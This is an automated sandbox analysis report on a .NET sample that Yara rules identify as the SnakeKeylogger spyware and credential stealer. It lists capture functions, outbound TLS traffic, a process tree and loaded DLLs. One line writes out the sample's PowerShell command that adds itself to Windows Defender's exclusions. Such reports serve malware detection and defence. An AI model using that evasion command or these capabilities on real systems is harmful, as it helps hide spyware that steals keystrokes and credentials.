Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process Stats: CPU usage > 49%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 75DE0000 page read and write Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 77DA0000 page read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0308DE4C 0_2_0308DE4C
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0AB106A8 0_2_0AB106A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0AB132C8 0_2_0AB132C8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0AB10698 0_2_0AB10698
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168C146 6_2_0168C146
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01687118 6_2_01687118
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168A088 6_2_0168A088
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01685362 6_2_01685362
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168D278 6_2_0168D278
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168C468 6_2_0168C468
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168C738 6_2_0168C738
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_016869A0 6_2_016869A0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168E988 6_2_0168E988
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168CA08 6_2_0168CA08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168CCD8 6_2_0168CCD8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168CFAB 6_2_0168CFAB
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01683E09 6_2_01683E09
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168F631 6_2_0168F631
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168E97B 6_2_0168E97B
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01683AB1 6_2_01683AB1
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168FA88 6_2_0168FA88
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF1E80 6_2_06DF1E80
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF17A0 6_2_06DF17A0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0B30 6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9C70 6_2_06DF9C70
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF5028 6_2_06DF5028
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9548 6_2_06DF9548
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF2968 6_2_06DF2968
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEAF8 6_2_06DFEAF8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE6B0 6_2_06DFE6B0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE6AF 6_2_06DFE6AF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE258 6_2_06DFE258
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE249 6_2_06DFE249
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF1E77 6_2_06DF1E77
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFDE00 6_2_06DFDE00
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF1793 6_2_06DF1793
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF8B93 6_2_06DF8B93
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFF3B8 6_2_06DFF3B8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF8BA0 6_2_06DF8BA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEF51 6_2_06DFEF51
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEF60 6_2_06DFEF60
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEB08 6_2_06DFEB08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0B20 6_2_06DF0B20
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD0F8 6_2_06DFD0F8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFCCA0 6_2_06DFCCA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0040 6_2_06DF0040
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9C6D 6_2_06DF9C6D
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFFC68 6_2_06DFFC68
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF501F 6_2_06DF501F
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFF810 6_2_06DFF810
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0007 6_2_06DF0007
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFF801 6_2_06DFF801
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFDDFF 6_2_06DFDDFF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD999 6_2_06DFD999
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD9A8 6_2_06DFD9A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD550 6_2_06DFD550
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9543 6_2_06DF9543
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD540 6_2_06DFD540
Sample file is different than original file name gathered from version info
Source: VbcXXnmIwPPhh.exe, 00000000.00000000.1255275199.0000000000F0A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1266065314.00000000015BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1283325923.0000000007D2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1282208749.0000000007730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3728527291.00000000073D9000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe Binary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe
Uses 32bit PE files
Source: VbcXXnmIwPPhh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: VbcXXnmIwPPhh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.SetAccessControl
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.AddAccessRule
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.SetAccessControl
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/9@4/4
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VbcXXnmIwPPhh.exe.log Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xqyadvx.hmn.ps1 Jump to behavior
Source: VbcXXnmIwPPhh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VbcXXnmIwPPhh.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
